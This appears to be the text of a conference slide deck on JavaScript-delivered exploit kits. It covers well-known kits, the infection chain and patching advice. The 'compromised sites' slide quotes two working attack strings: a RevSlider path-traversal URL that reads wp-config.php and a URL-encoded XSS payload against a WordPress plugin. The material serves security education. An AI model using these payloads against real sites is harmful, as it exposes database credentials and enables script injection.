Download - Javascript Exploitation
Exploit Kits – Exploitation via JSRashid Feroz & Krishnendu Paul
About us!
• Information security enthusiasts.
• Love to break into things!
• A college grad and an Industry veteran.
What Are Exploit Kits?• A toolkit that automates the exploitation of client-side
vulnerabilities.
• Usually targets browsers and programs that a website can invoke through the browser.
• The attacker doesn’t need to know how to create exploits to benefit from infecting systems.
• It provides a user-friendly web interface that helps the attacker track the infection campaign.
Famous Exploit Kits
• Blackhole• FlashPack • Magnitude • Rig • Nuclear • Angler • Sweet Orange • Neutrino Exploit Kits
Exploit Kit distribution
Most commonly used vulnerable 3rd party software
• Oracle Java Runtime environment
• Adobe Acrobat Reader
• Adobe Flash Player / Plugin
• Apple Quicktime
From sale to infection
• The buyer would license a copy of a kit from the creator.
• The victim opens a spam email link or loads an infected web page.
• The page contains JavaScript that determines vulnerabilities of the victim’s computer and notifies the kit user of what files the victim’s computer held.
• If the kit found a usable exploit, the malicious payload would be loaded onto the victim's computer.
Phases
• Compromised site • Redirector • Landing page • Post-infection traffic Phases
Compromised sites• LFI in RevSlider plugin of Wordpress
– http://[compromised.com]/wp-admin/admin- ajax.php?action=revslider_show_image&img=../wp-config.php
• XSS in Simple Security Wordpress plugin– http://[compromised.com]/wp-admin/users.php?page=access_log&datefilter=
%27%22%3E%3C script%3Ealert%28/HACKED/%29;%3C/script%3E
• Drupal Sql Injection
• CDN reference compromise (Eg. Operation Poisoned Helmand)
• Iframe Injectors Compromised sites
Demo time
Demo
Beef framework(JS hook)
Payload delivery via Social Engineering
Antivirus evasion(FUD)
Get a meterpreter shell back
Virus scan results
How to stay safe?
• Stay up to date with security patches on your desktop machine.
• There are several specialized tools which identify vulnerabilities in systems, install patches, and validate those patches. Use a 3rd party utility or software to constantly update your system.
• Make sure that your browser, operating system, and browser’s
plugins are all up to date. • Install a good host-based intrusion prevention system (HIPS) to
monitor for suspicious activity on your computer.
References
• https://heimdalsecurity.com/blog/nuclear-exploit-kit-flash-player/
• http://www.slideshare.net/SafeBytesSoftware/exploit-kits-and-your-computers-vulnerability.
• https://heimdalsecurity.com/blog/exploit-kits-service-automation-changing-face-cyber-crime/
Thanks